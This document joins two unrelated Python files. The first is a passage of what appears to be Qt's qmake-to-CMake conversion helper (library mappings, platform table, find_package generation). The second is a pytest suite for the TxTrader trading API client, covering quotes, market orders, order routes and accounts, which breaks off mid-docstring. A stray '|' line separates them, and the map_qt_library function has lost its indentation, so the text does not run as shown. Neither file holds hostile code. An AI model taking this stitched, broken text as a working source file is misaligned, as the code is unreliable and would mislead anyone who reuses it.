LibraryMapping("journald", "Libsystemd", "PkgConfig::Libsystemd"),
LibraryMapping("jpeg", "JPEG", "JPEG::JPEG"), # see also libjpeg
LibraryMapping("libatomic", "WrapAtomic", "WrapAtomic::WrapAtomic"),
LibraryMapping("libb2", "Libb2", "PkgConfig::Libb2"),
LibraryMapping("libclang", "WrapLibClang", "WrapLibClang::WrapLibClang"),
LibraryMapping("libdl", None, "${CMAKE_DL_LIBS}"),
LibraryMapping("libinput", "Libinput", "Libinput::Libinput"),
LibraryMapping("libjpeg", "JPEG", "JPEG::JPEG"), # see also jpeg
LibraryMapping("libpng", "WrapPNG", "WrapPNG::WrapPNG", is_bundled_with_qt=True),
LibraryMapping("libproxy", "Libproxy", "PkgConfig::Libproxy"),
LibraryMapping("librt", "WrapRt", "WrapRt::WrapRt"),
LibraryMapping("libudev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("lttng-ust", "LTTngUST", "LTTng::UST", resultVariable="LTTNGUST"),
LibraryMapping("mtdev", "Mtdev", "PkgConfig::Mtdev"),
LibraryMapping("mysql", "MySQL", "MySQL::MySQL"),
LibraryMapping("odbc", "ODBC", "ODBC::ODBC"),
LibraryMapping("opengl_es2", "GLESv2", "GLESv2::GLESv2"),
LibraryMapping("opengl", "WrapOpenGL", "WrapOpenGL::WrapOpenGL", resultVariable="WrapOpenGL"),
LibraryMapping(
"openssl_headers",
"WrapOpenSSLHeaders",
"WrapOpenSSLHeaders::WrapOpenSSLHeaders",
resultVariable="TEST_openssl_headers",
appendFoundSuffix=False,
test_library_overwrite="WrapOpenSSLHeaders::WrapOpenSSLHeaders",
run_library_test=True,
),
LibraryMapping(
"openssl",
"WrapOpenSSL",
"WrapOpenSSL::WrapOpenSSL",
resultVariable="TEST_openssl",
appendFoundSuffix=False,
run_library_test=True,
no_link_so_name="openssl_headers",
),
LibraryMapping("oci", "Oracle", "Oracle::OCI"),
LibraryMapping(
"pcre2",
"WrapPCRE2",
"WrapPCRE2::WrapPCRE2",
extra=["10.20", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("pps", "PPS", "PPS::PPS"),
LibraryMapping("psql", "PostgreSQL", "PostgreSQL::PostgreSQL"),
LibraryMapping("slog2", "Slog2", "Slog2::Slog2"),
LibraryMapping("speechd", "SpeechDispatcher", "SpeechDispatcher::SpeechDispatcher"),
LibraryMapping("sqlite2", None, None), # No more sqlite2 support in Qt6!
LibraryMapping("sqlite3", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("sqlite", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("tslib", "Tslib", "PkgConfig::Tslib"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"), # see also libudev!
LibraryMapping("vulkan", "Vulkan", "Vulkan::Vulkan"),
LibraryMapping("wayland_server", "Wayland", "Wayland::Server"), # used in qtbase/src/gui
LibraryMapping("wayland-server", "Wayland", "Wayland::Server"), # used in qtwayland
LibraryMapping("wayland-client", "Wayland", "Wayland::Client"),
LibraryMapping("wayland-cursor", "Wayland", "Wayland::Cursor"),
LibraryMapping("wayland-egl", "Wayland", "Wayland::Egl"),
LibraryMapping(
"wayland-kms", "Waylandkms", "PkgConfig::Waylandkms"
), # TODO: check if this actually works
LibraryMapping("x11", "X11", "X11::X11"),
LibraryMapping("x11sm", "X11", "${X11_SM_LIB} ${X11_ICE_LIB}", resultVariable="X11_SM"),
LibraryMapping(
"xcb",
"XCB",
"XCB::XCB",
extra=["1.11"],
resultVariable="TARGET XCB::XCB",
appendFoundSuffix=False,
),
LibraryMapping(
"xcb_glx", "XCB", "XCB::GLX", extra=["COMPONENTS", "GLX"], resultVariable="XCB_GLX"
),
LibraryMapping(
"xcb_icccm",
"XCB",
"XCB::ICCCM",
extra=["0.3.9", "COMPONENTS", "ICCCM"],
resultVariable="XCB_ICCCM",
),
LibraryMapping(
"xcb_image",
"XCB",
"XCB::IMAGE",
extra=["0.3.9", "COMPONENTS", "IMAGE"],
resultVariable="XCB_IMAGE",
),
LibraryMapping(
"xcb_keysyms",
"XCB",
"XCB::KEYSYMS",
extra=["0.3.9", "COMPONENTS", "KEYSYMS"],
resultVariable="XCB_KEYSYMS",
),
LibraryMapping(
"xcb_randr", "XCB", "XCB::RANDR", extra=["COMPONENTS", "RANDR"], resultVariable="XCB_RANDR"
),
LibraryMapping(
"xcb_render",
"XCB",
"XCB::RENDER",
extra=["COMPONENTS", "RENDER"],
resultVariable="XCB_RENDER",
),
LibraryMapping(
"xcb_renderutil",
"XCB",
"XCB::RENDERUTIL",
extra=["0.3.9", "COMPONENTS", "RENDERUTIL"],
resultVariable="XCB_RENDERUTIL",
),
LibraryMapping(
"xcb_shape", "XCB", "XCB::SHAPE", extra=["COMPONENTS", "SHAPE"], resultVariable="XCB_SHAPE"
),
LibraryMapping(
"xcb_shm", "XCB", "XCB::SHM", extra=["COMPONENTS", "SHM"], resultVariable="XCB_SHM"
),
LibraryMapping(
"xcb_sync", "XCB", "XCB::SYNC", extra=["COMPONENTS", "SYNC"], resultVariable="XCB_SYNC"
),
LibraryMapping(
"xcb_xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb-xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb_xinput",
"XCB",
"XCB::XINPUT",
extra=["1.12", "COMPONENTS", "XINPUT"],
resultVariable="XCB_XINPUT",
),
LibraryMapping(
"xcb_xkb", "XCB", "XCB::XKB", extra=["COMPONENTS", "XKB"], resultVariable="XCB_XKB"
),
LibraryMapping("xcb_xlib", "X11_XCB", "X11::XCB"),
LibraryMapping("xcomposite", "XComposite", "PkgConfig::XComposite"),
LibraryMapping("xkbcommon_evdev", "XKB", "XKB::XKB", extra=["0.5.0"]), # see also xkbcommon
LibraryMapping("xkbcommon_x11", "XKB_COMMON_X11", "PkgConfig::XKB_COMMON_X11", extra=["0.5.0"]),
LibraryMapping("xkbcommon", "XKB", "XKB::XKB", extra=["0.5.0"]),
LibraryMapping("xlib", "X11", "X11::X11"),
LibraryMapping("xrender", "XRender", "PkgConfig::XRender", extra=["0.6"]),
LibraryMapping("zlib", "ZLIB", "ZLIB::ZLIB", extra=["1.0.8"]),
LibraryMapping("zstd", "ZSTD", "ZSTD::ZSTD", extra=["1.3"]),
LibraryMapping("tiff", "TIFF", "TIFF::TIFF"),
LibraryMapping("webp", "WrapWebP", "WrapWebP::WrapWebP"),
LibraryMapping("jasper", "WrapJasper", "WrapJasper::WrapJasper"),
LibraryMapping("sdl2", "WrapSDL2", "WrapSDL2::WrapSDL2"),
LibraryMapping("hunspell", "Hunspell", "Hunspell::Hunspell"),
LibraryMapping(
"qt3d-assimp",
"WrapQt3DAssimp",
"WrapQt3DAssimp::WrapQt3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_assimp",
appendFoundSuffix=False,
),
LibraryMapping(
"quick3d_assimp",
"WrapQuick3DAssimp",
"WrapQuick3DAssimp::WrapQuick3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_quick3d_assimp",
appendFoundSuffix=False,
),
]
def _adjust_library_map():
    # Assign a Linux condition on all x and wayland related packages.
    # We don't want to get pages of package not found messages on
    # Windows and macOS, and this also improves configure time on
    # those platforms.
    # str.startswith accepts a tuple of prefixes, so a single call per
    # mapping replaces the original any([...]) scan over a temporary list.
    linux_package_prefixes = ("xcb", "x11", "xkb", "xrender", "xlib", "wayland")
    for mapping in _library_map:
        if mapping.soName.startswith(linux_package_prefixes):
            mapping.emit_if = "config.linux"


_adjust_library_map()
def find_3rd_party_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
    """Return the third-party LibraryMapping with the given soName, or None."""
    return next((mapping for mapping in _library_map if mapping.soName == soName), None)
def find_qt_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
    """Return the Qt LibraryMapping with the given soName, or None."""
    return next((mapping for mapping in _qt_library_map if mapping.soName == soName), None)
def find_library_info_for_target(targetName: str) -> typing.Optional[LibraryMapping]:
    """Look up a LibraryMapping by CMake target name.

    Qt targets are matched with any trailing "Private" suffix stripped;
    third-party targets are matched verbatim.  Returns None on no match.
    """
    qt_target = targetName[: -len("Private")] if targetName.endswith("Private") else targetName
    for mapping in _qt_library_map:
        if mapping.targetName == qt_target:
            return mapping
    for mapping in _library_map:
        if mapping.targetName == targetName:
            return mapping
    return None
# For a given qmake library (e.g. 'openssl_headers'), check whether this is a fake library used
# for the /nolink annotation, and return the actual annotated qmake library ('openssl/nolink').
def find_annotated_qmake_lib_name(lib: str) -> str:
    """Resolve a no-link helper library back to its '<soName>/nolink' form."""
    for mapping in _library_map:
        if mapping.no_link_so_name == lib:
            return f"{mapping.soName}/nolink"
    return lib
def featureName(name: str) -> str:
    """Sanitize a feature name into an identifier-safe string.

    Non-alphanumeric characters (other than "_") are replaced with "_",
    except for C++ standard features ("c++11" etc.), where "x" is used so
    the result reads "cxx11" rather than "c__11".
    """
    replacement = "x" if name.startswith("c++") else "_"
    return re.sub(r"[^a-zA-Z0-9_]", replacement, name)
def map_qt_library(lib: str) -> str:
private = False
if lib.endswith("-private"):
private = True
lib = lib[:-8]
mapped = find_qt_library_mapping(lib)
qt_name = lib
if mapped:
assert mapped.targetName # Qt libs must have a target name set
qt_name = mapped.targetName
if private:
qt_name += "Private"
return qt_name
# Translation table from qmake platform / compiler scope names to the
# corresponding CMake condition variables.  Consumed by map_platform();
# names not listed here are passed through unchanged.
platform_mapping = {
    "win32": "WIN32",
    "win": "WIN32",
    "unix": "UNIX",
    "darwin": "APPLE",
    "linux": "LINUX",
    "integrity": "INTEGRITY",
    "qnx": "QNX",
    "vxworks": "VXWORKS",
    "hpux": "HPUX",
    "nacl": "NACL",
    "android": "ANDROID",
    "android-embedded": "ANDROID_EMBEDDED",
    "uikit": "UIKIT",
    "tvos": "TVOS",
    "watchos": "WATCHOS",
    "winrt": "WINRT",
    "wasm": "WASM",
    "emscripten": "EMSCRIPTEN",
    "msvc": "MSVC",
    "clang": "CLANG",
    "gcc": "GCC",
    "icc": "ICC",
    "intel_icc": "ICC",
    "osx": "MACOS",
    "ios": "IOS",
    "freebsd": "FREEBSD",
    "openbsd": "OPENBSD",
    "mingw": "MINGW",
    "netbsd": "NETBSD",
    "haiku": "HAIKU",
    "mac": "APPLE",
    "macx": "MACOS",
    "macos": "MACOS",
    "macx-icc": "(MACOS AND ICC)",
}
def map_platform(platform: str) -> str:
    """Map a qmake platform name to its CMake equivalent, or pass it through."""
    try:
        return platform_mapping[platform]
    except KeyError:
        return platform
def is_known_3rd_party_library(lib: str) -> bool:
    """Check whether a qmake third-party library name has a CMake mapping.

    Accepts both the "<lib>/nolink" and "<lib>_nolink" spellings; those
    are resolved through the no_link_so_name indirection when present.
    """
    stripped_no_link = lib.endswith(("/nolink", "_nolink"))
    if stripped_no_link:
        lib = lib[: -len("/nolink")]

    mapping = find_3rd_party_library_mapping(lib)
    if stripped_no_link and mapping is not None and mapping.no_link_so_name:
        resolved = find_3rd_party_library_mapping(mapping.no_link_so_name)
        if resolved is not None:
            mapping = resolved

    return mapping is not None
def map_3rd_party_library(lib: str) -> str:
    """Map a qmake third-party library name to its CMake target name.

    A trailing "/nolink" is carried over as a "_nolink" suffix on the
    target, unless the mapping redirects to a dedicated no-link entry.
    Returns the input unchanged when no mapping (or target) exists.
    """
    suffix = ""
    no_link_requested = lib.endswith("/nolink")
    if no_link_requested:
        lib = lib[: -len("/nolink")]
        suffix = "_nolink"

    mapping = find_3rd_party_library_mapping(lib)
    if no_link_requested and mapping and mapping.no_link_so_name:
        redirected = find_3rd_party_library_mapping(mapping.no_link_so_name)
        if redirected:
            # A dedicated no-link mapping already points at the right
            # target; drop the suffix.
            mapping = redirected
            suffix = ""

    if not mapping or not mapping.targetName:
        return lib
    return mapping.targetName + suffix
# Some compile tests need a different library than the one their feature
# normally depends on (e.g. the dtls/ocsp tests only need OpenSSL headers).
compile_test_dependent_library_mapping = {
    "dtls": {"openssl": "openssl_headers"},
    "ocsp": {"openssl": "openssl_headers"},
}


def get_compile_test_dependent_library_mapping(compile_test_name: str, dependency_name: str) -> str:
    """Return the library to use for a compile test's dependency.

    Falls back to dependency_name itself when no override is registered
    for the given compile test.
    """
    overrides = compile_test_dependent_library_mapping.get(compile_test_name, {})
    return overrides.get(dependency_name, dependency_name)
def generate_find_package_info(
    lib: LibraryMapping,
    use_qt_find_package: bool = True,
    *,
    indent: int = 0,
    emit_if: str = "",
    use_system_package_name: bool = False,
    module: str = "",
) -> str:
    """Generate a qt_find_package()/find_package() CMake call for `lib`.

    lib: the LibraryMapping describing package name, target and extra args.
    use_qt_find_package: emit qt_find_package() (with PROVIDED_TARGETS,
        MODULE_NAME, QMAKE_LIB metadata) instead of plain find_package().
    indent: indentation level for the generated code, in units of `one_ind`.
    emit_if: optional CMake condition; the call is wrapped in an if() block.
    use_system_package_name: rewrite "Wrap*" names to "WrapSystem*".
    module: Qt module name forwarded as MODULE_NAME to qt_find_package().
    """
    isRequired = False
    extra = lib.extra.copy()
    if "REQUIRED" in extra and use_qt_find_package:
        # REQUIRED is expressed via set_package_properties() below rather
        # than being forwarded to qt_find_package().
        isRequired = True
        extra.remove("REQUIRED")
    cmake_target_name = lib.targetName
    assert cmake_target_name
    # _nolink or not does not matter at this point:
    if cmake_target_name.endswith("_nolink") or cmake_target_name.endswith("/nolink"):
        cmake_target_name = cmake_target_name[:-7]
    initial_package_name: str = lib.packageName if lib.packageName else ""
    package_name: str = initial_package_name
    if use_system_package_name:
        replace_args = ["Wrap", "WrapSystem"]
        package_name = package_name.replace(*replace_args)  # type: ignore
        cmake_target_name = cmake_target_name.replace(*replace_args)  # type: ignore
    if use_qt_find_package:
        # Append qt_find_package metadata keywords in a fixed order.
        if cmake_target_name:
            extra += ["PROVIDED_TARGETS", cmake_target_name]
        if module:
            extra += ["MODULE_NAME", module]
        extra += ["QMAKE_LIB", find_annotated_qmake_lib_name(lib.soName)]
    result = ""
    one_ind = " "
    ind = one_ind * indent
    if use_qt_find_package:
        if extra:
            result = f"{ind}qt_find_package({package_name} {' '.join(extra)})\n"
        else:
            result = f"{ind}qt_find_package({package_name})\n"
        if isRequired:
            # Note: uses the pre-WrapSystem package name on purpose.
            result += (
                f"{ind}set_package_properties({initial_package_name} PROPERTIES TYPE REQUIRED)\n"
            )
    else:
        if extra:
            result = f"{ind}find_package({package_name} {' '.join(extra)})\n"
        else:
            result = f"{ind}find_package({package_name})\n"
    # If a package should be found only in certain conditions, wrap
    # the find_package call within that condition.
    if emit_if:
        result = f"if(({emit_if}) OR QT_FIND_ALL_PACKAGES_ALWAYS)\n{one_ind}{result}endif()\n"
    return result
def _set_up_py_parsing_nicer_debug_output(pp):
    """Patch pyparsing's default debug actions to print nesting markers.

    Each match start deepens the "> " prefix by one level; success and
    exception actions print at the current depth and then pop one level.
    """
    indent = -1

    def entering(fn):
        def wrapped(*args):
            nonlocal indent
            indent += 1
            print("> " * indent, end="")
            return fn(*args)

        return wrapped

    def leaving(fn):
        def wrapped(*args):
            nonlocal indent
            # Print first, then unwind, so the marker matches the level
            # of the expression that just finished.
            print("> " * indent, end="")
            indent -= 1
            return fn(*args)

        return wrapped

    pp._defaultStartDebugAction = entering(pp._defaultStartDebugAction)
    pp._defaultSuccessDebugAction = leaving(pp._defaultSuccessDebugAction)
    pp._defaultExceptionDebugAction = leaving(pp._defaultExceptionDebugAction)
|
# -*- coding: utf-8 -*-
"""
test-txtrader.py
--------------
TxTrader unit/regression test script
Copyright (c) 2016 Reliance Systems Inc. <mkrueger@rstms.net>
Licensed under the MIT license. See LICENSE for details.
"""
from txtrader_client import API
import subprocess
import os
import signal
import time
import ujson as json
from pprint import pprint, pformat
import pytest
import re
import datetime
# When True, poll orders until they fill; when False, accept 'Pending'.
WAIT_FOR_FILL = False
# Seconds to wait for an order fill before failing the test.
FILL_TIMEOUT = 30
# Raw JSON order-route definition exercised by test_set_order_route().
TEST_ALGO_ROUTE = '{"TEST-ATM-ALGO":{"STRAT_ID":"BEST","BOOKING_TYPE":"3","STRAT_TIME_TAGS":"168;126","STRAT_PARAMETERS":{"99970":"2","99867":"N","847":"BEST","90057":"BEST","91000":"4.1.95"},"ORDER_FLAGS_3":"0","ORDER_CLONE_FLAG":"1","STRAT_TARGET":"ATDL","STRATEGY_NAME":"BEST","STRAT_REDUNDANT_DATA":{"UseStartTime":"false","UseEndTime":"false","cConditionalType":"{NULL}"},"STRAT_TIME_ZONE":"America/New_York","STRAT_TYPE":"COWEN_ATM_US_EQT","STRAT_STRING_40":"BEST","UTC_OFFSET":"-240"}}'
# Backend under test; the suite branches on 'RTX' (RealTick) vs 'TWS'.
TEST_MODE = 'RTX'
# Service endpoint; both environment variables must be set before running.
TEST_HOST = os.environ['TXTRADER_HOST']
TEST_PORT = int(os.environ['TXTRADER_HTTP_PORT'])
def _listening(host, port, timeout=15):
    """Return True once host:port accepts connections (wait-for-it CLI)."""
    exit_status = os.system(f'wait-for-it -s {host}:{port} -t {timeout}')
    return exit_status == 0
def _wait_api_status(TEST_MODE, timeout=15):
    """Poll until the txtrader service reports status 'Up'; return the client.

    Reconnects from scratch on any connection or status-query error, and
    asserts if the service is not up within `timeout` seconds.
    """
    start = time.time()
    status = None
    last_status = None
    api = None
    while status != 'Up':
        try:
            if not api:
                api = API(TEST_MODE)
                print(f'new api connection: {api}')
        except Exception as ex:
            # Connection failed: drop the client and retry from scratch.
            print(f'Connection raised {ex}, retrying...')
            api = None
            time.sleep(1)
        else:
            assert api
            try:
                status = api.status()
            except Exception as ex:
                # Status query failed: also reconnect from scratch.
                print(f'status query on {api} raised {ex}, retrying...')
                api = None
                time.sleep(1)
            else:
                if last_status != status:
                    # Only log status transitions to keep output readable.
                    print(f"status={status}")
                last_status = status
        assert (time.time() - start) < timeout, 'timeout waiting for initialization'
        time.sleep(1)
    return api
@pytest.fixture(scope='module')
def api():
    """Module-scoped txtrader API client, connected and reporting 'Up'."""
    print('fixture: creating api connection')
    assert _listening(TEST_HOST, TEST_PORT)
    return _wait_api_status(TEST_MODE)
def dump(label, o):
    """Pretty-print `o` (serialized to JSON) under `label` for diagnostics."""
    formatted = pformat(json.dumps(o))
    print('%s:\n%s' % (label, formatted))
def test_init(api):
    """Smoke test: the fixture connection is alive and reports 'Up'."""
    print()
    print('test_init checking api')
    assert api
    assert api.status() == 'Up'
    print('waiting 1 second...')
    time.sleep(1)
    print('done')
def test_shutdown_and_reconnect():
    """Shut the service down via the API and verify it restarts cleanly.

    Uses its own connection rather than the module fixture, since the
    shutdown invalidates any existing client.  The unused locals
    `shutdown_time`/`shutdown` from the original were removed.
    """
    print('\nconnecting...')
    api = _wait_api_status(TEST_MODE)
    assert api
    assert api.status() == 'Up'
    print('shutting down api')
    try:
        api.shutdown('testing shutdown request')
        print('waiting for shutdown...')
        time.sleep(5)
        print('waiting for restart...')
    except Exception as ex:
        print(f'shutdown raised {ex}')
        assert False
    # The service supervisor should bring the port back; allow generous timeouts.
    assert _listening(TEST_HOST, TEST_PORT, 60), 'timeout waiting for restart'
    try:
        api = _wait_api_status(TEST_MODE, 90)
    except Exception as ex:
        print(f'restart raised {ex}')
        assert False
    assert api
    assert api.status() == 'Up'
def test_stock_prices(api):
    """Exercise add/del/query of symbols and validate IBM quote fields."""
    # Remember pre-existing subscriptions so cleanup checks can be conditional.
    slist = set(api.query_symbols())
    s = api.add_symbol('IBM')
    assert s
    p = api.query_symbol('IBM')
    assert p
    assert type(p) == dict
    print(repr(p))
    # (field name, expected type, required) for each quote field.
    tdata = [
        ('symbol', str, True),
        ('fullname', str, True),
        ('last', float, True),
        ('size', int, True),
        ('volume', int, True),
        ('open', float, True),
        ('high', float, True),
        ('low', float, True),
        ('close', float, True),
        ('vwap', float, True),
        ('tradetime', str, True),
        ('cusip', str, True),
    ]
    #('bars', list, True),
    for key, _type, required in tdata:
        assert key in p
        assert type(p[key]) == _type
        if required:
            assert not p[key] == None
    r = api.query_symbol_data('IBM')
    assert r
    dump('raw data for IBM', r)
    l = api.query_symbols()
    assert l
    dump('symbol list', l)
    assert 'IBM' in l
    s = api.add_symbol('TSLA')
    assert s
    dump('add TSLA', s)
    s = api.add_symbol('GOOG')
    assert s
    dump('add GOOG', s)
    s = api.add_symbol('AAPL')
    assert s
    dump('add AAPL', s)
    l = api.query_symbols()
    assert set(['IBM', 'TSLA', 'GOOG', 'AAPL']).issubset(set(l))
    dump('symbol list', l)
    s = api.del_symbol('TSLA')
    assert s
    dump('del TSLA', s)
    l = api.query_symbols()
    # TSLA should only disappear if it wasn't subscribed before this test ran.
    if not 'TSLA' in slist:
        assert not 'TSLA' in l
    assert set(['IBM', 'GOOG', 'AAPL']).issubset(set(l))
    dump('symbol list', l)
    print(repr(l))
def test_buy_sell(api):
    """Round-trip: market buy 100 IBM, then market sell 100 IBM."""
    print()
    account = api.account
    print('account=%s' % account)
    api.set_account(account)
    print('buying IBM')
    oid = _market_order(api, 'IBM', 100)
    o = api.query_order(oid)
    assert o
    assert type(o) == dict
    assert 'permid' in o
    oid = o['permid']
    assert 'status' in o
    dump('market_order(IBM,100)', o)
    print('selling IBM')
    # Negative quantity indicates a sell.
    oid = _market_order(api, 'IBM', -100)
    o = api.query_order(oid)
    assert o
    assert type(o) == dict
    assert 'permid' in o
    assert 'status' in o
    dump('market_order(IBM,-100)', o)
def test_set_order_route(api):
    """set_order_route() accepts str, dict, and JSON-string forms."""
    print()
    oldroute = api.get_order_route()
    assert type(oldroute) == dict
    assert list(oldroute.keys()) == ['DEMOEUR']
    r0 = 'DEMO'
    r1 = {'DEMO': None}
    r2 = {'DEMO': {'key1': 'value1', 'key2': 'value2'}}
    r3 = TEST_ALGO_ROUTE
    # Each (input, expected) pair: bare route names normalize to {name: None},
    # JSON strings are parsed, dicts pass through.
    for rin, rout in [(r0, r1), (r1, r1), (r2, r2), (json.dumps(r0), r1), (json.dumps(r1), r1), (json.dumps(r2), r2),
                      (r3, json.loads(r3))]:
        print('set_order_route(%s)' % repr(rin))
        assert api.set_order_route(rin) == rout
        assert api.get_order_route() == rout
    # Restore the original route for subsequent tests.
    assert api.set_order_route(oldroute) == oldroute
def test_partial_fill(api):
    """Verify a large order fills in multiple partial executions.

    Routes through 'DEMO', buys 1000 COWN, and counts partial fills while
    polling order status.  Verification is bypassed when the simulated
    market is closed.
    """
    print()
    account = api.account
    route = 'DEMO'
    oldroute = api.get_order_route()
    assert api.set_order_route(route)
    assert api.get_order_route() == {route: None}
    quantity = 1000
    symbol = 'COWN'
    print('buying %d %s' % (quantity, symbol))
    p = api.add_symbol(symbol)
    assert p
    d = api.query_symbol_data(symbol)
    #pprint(d)
    now = datetime.datetime.now().strftime('%H:%M:%S')
    # BUG FIX: the original f-string nested double quotes inside double
    # quotes (f"...{d["STARTTIME"]}..."), a SyntaxError before Python 3.12.
    print(f"trading hours: {d['STARTTIME']} to {d['STOPTIME']}")
    during_trading_hours = bool(d['STARTTIME'] <= now <= d['STOPTIME'])
    print(f"now={now} during_trading_hours={during_trading_hours}")
    o = api.market_order(account, route, symbol, quantity)
    assert o
    assert 'permid' in o
    assert 'status' in o
    assert not o['status'] == 'Filled'
    oid = o['permid']
    print('oid=%s' % oid)
    partial_fills = 0
    while o['status'] != 'Filled':
        o = api.query_order(oid)
        #o={'status':'spoofed','TYPE':'spoofed'}
        #pprint(o)
        status = o['status']
        filled = o['filled'] if 'filled' in o else 0
        remaining = o['remaining'] if 'remaining' in o else 0
        if (int(filled) > 0) and (int(remaining) > 0) and (int(filled) < quantity):
            partial_fills += 1
        average_price = o['avgfillprice'] if 'avgfillprice' in o else None
        print(
            'status=%s filled=%s remaining=%s average_price=%s type=%s' % (status, filled, remaining, average_price, o['type'])
        )
        # A 'Filled' status with a short fill count would be a server bug.
        assert not (status == 'Filled' and filled < quantity)
        if not during_trading_hours:
            print('test verification disabled - simulated market is closed')
            partial_fills = -1
            break
        assert status in ['Submitted', 'Pending', 'Filled']
        time.sleep(1)
    assert partial_fills
    # Flatten the position and restore the original route.
    o = api.market_order(account, route, symbol, quantity * -1)
    assert api.set_order_route(oldroute)
def test_status(api):
    # The fixture guarantees the service came up; confirm it is still 'Up'.
    assert api.status() == 'Up'
def test_uptime(api):
    """uptime() returns a non-empty string."""
    uptime = api.uptime()
    assert uptime
    print('uptime: %s' % repr(uptime))
    assert type(uptime) == str
def test_version(api):
    # version() returns a truthy structure describing the server build.
    assert api.version()
def test_symbol_price(api):
    """query_symbol() works whether or not the symbol is subscribed."""
    orig_symbols = api.query_symbols()
    assert type(orig_symbols) == list
    # Unsubscribe AAPL if present so the query below hits the unsubscribed path.
    if 'AAPL' in orig_symbols:
        ret = api.del_symbol('AAPL')
        assert ret
    symbols = api.query_symbols()
    assert type(symbols) == list
    if not 'AAPL' in orig_symbols:
        assert not 'AAPL' in symbols
    price = api.query_symbol('AAPL')
    #assert not price
    assert price
    ret = api.add_symbol('AAPL')
    assert ret
    p = api.query_symbol('AAPL')
    assert p
    assert type(p) == dict
    assert p['symbol'] == 'AAPL'
def _verify_barchart_enabled(api, option):
    """Return True if the server's version flags enable `option` barcharts."""
    version = api.version()
    assert option in ['SYMBOL_BARCHART', 'BARCHART']
    assert version
    assert type(version) == dict
    assert type(version['flags']) == dict
    assert option in version['flags']
    # Deliberate equality (not identity) check, matching the original:
    # the flag value may be any object that compares equal to True.
    return version['flags'][option] == True
def test_symbol_bars(api):
    """query_symbol_bars() returns typed bar rows when barcharts are enabled."""
    # Re-subscribe TSLA from scratch for a clean bar query.
    if 'TSLA' in api.query_symbols():
        assert api.del_symbol('TSLA')
    assert api.add_symbol('TSLA')
    assert 'TSLA' in api.query_symbols()
    bars = api.query_symbol_bars('TSLA')
    assert type(bars) == list
    print(repr(bars))
    if _verify_barchart_enabled(api, 'SYMBOL_BARCHART'):
        assert type(bars[0]) == list
        for bar in bars:
            print('%s' % repr(bar))
            # Per-column expected types: date, time, OHLC floats, int volume.
            for i in range(len(bar)):
                assert type(bar[i]) in [[str], [str], [float], [float], [float], [float], [int]][i]
            assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', bar[0])
            assert re.match('^\\d\\d:\\d\\d:\\d\\d$', bar[1])
    else:
        print('barchart disabled')
        assert bars == []
def test_query_accounts(api):
    """Validate query_accounts()/query_account(), including field filtering."""
    test_account = api.account
    accounts = api.query_accounts()
    assert type(accounts) == list
    assert accounts
    for a in accounts:
        # NOTE(review): both sides of this `or` are identical — likely a
        # Python 2 str/unicode leftover; confirm before simplifying.
        assert type(a) == str or type(a) == str
    assert test_account in accounts
    ret = api.set_account(test_account)
    assert ret
    # Invalid account / field queries return None rather than raising.
    ret = api.query_account('b.b.b.INVALID_ACCOUNT')
    assert ret == None
    ret = api.query_account(test_account, 'INVALID_FIELD')
    assert ret == None
    ret = api.query_account(test_account, 'INVALID_FIELD_1,INVALID_FIELD_2')
    assert ret == None
    #print('query_account(%s)...' % a)
    data = api.query_account(test_account)
    #print('account[%s]: %s' % (a, repr(data)))
    assert data
    assert type(data) == dict
    # Public fields only (underscore-prefixed keys are txtrader-internal).
    fields = [k for k in data if not k.startswith('_')]
    if TEST_MODE == 'RTX':
        field = 'EXCESS_EQ'
    elif TEST_MODE == 'TWS':
        field = 'LiquidationValue'
    # txtrader is expected to set the value _cash to the correct field
    assert '_cash' in data
    assert float(data['_cash']) == round(float(data[field]), 2)
    sdata = api.query_account(test_account, field)
    assert sdata
    assert type(sdata) == dict
    assert field in sdata
    # A comma-separated field list restricts the returned keys exactly.
    rfields = ','.join(fields[:3])
    print('requesting fields: %s' % rfields)
    sdata = api.query_account(test_account, rfields)
    print('got %s' % repr(sdata))
    assert sdata
    assert type(sdata) == dict
    for field in rfields.split(','):
        assert field in sdata
    assert set(rfields.split(',')) == set(sdata.keys())
    #print('account[%s]: %s' % (a, repr(sdata)))
def _wait_for_fill(api, oid, return_on_error=False):
    """Poll order `oid` until 'Filled' (or 'Error' when return_on_error).

    When WAIT_FOR_FILL is disabled, the wait ends early instead of
    polling for up to FILL_TIMEOUT seconds.
    """
    print('Waiting for order %s to fill...' % oid)
    done = False
    last_status = ''
    count = 0
    while not done:
        o = api.query_order(oid)
        if last_status != o['status']:
            # Only log status transitions.
            last_status = o['status']
            print('order status: %s' % o['status'])
        if return_on_error and o['status'] == 'Error':
            return
        assert o['status'] != 'Error'
        if o['status'] == 'Filled':
            done = True
        else:
            count += 1
            if WAIT_FOR_FILL:
                assert count < FILL_TIMEOUT
                time.sleep(1)
            else:
                if o['status'] == 'Pending':
                    print("fill wait disabled, returning")
                done = True
def _position(api, account):
    """Return the position dict for `account` from query_positions().

    The original carried an `if account in pos ... else p = {}` whose
    else-branch was unreachable behind `assert account in pos`; the dead
    branch has been removed without changing behavior.
    """
    pos = api.query_positions()
    assert type(pos) == dict
    assert account in pos
    p = pos[account]
    assert type(p) == dict
    return p
def _market_order(api, symbol, quantity, return_on_error=False):
    """Place a market order on route DEMOEUR, wait for fill, return order id."""
    print('Sending market_order(%s, %d)...' % (symbol, quantity))
    account = api.account
    route = 'DEMOEUR'
    o = api.market_order(account, route, symbol, quantity)
    print('market_order returned %s' % repr(o))
    assert o
    assert 'permid' in o
    assert 'status' in o
    oid = o['permid']
    assert type(oid) == str
    print('market_order(%s,%s) returned oid=%s status=%s' % (symbol, quantity, oid, o['status']))
    _wait_for_fill(api, oid, return_on_error)
    return oid
def test_trades(api):
    """Flatten any AAPL position, then verify buys/sells adjust the position.

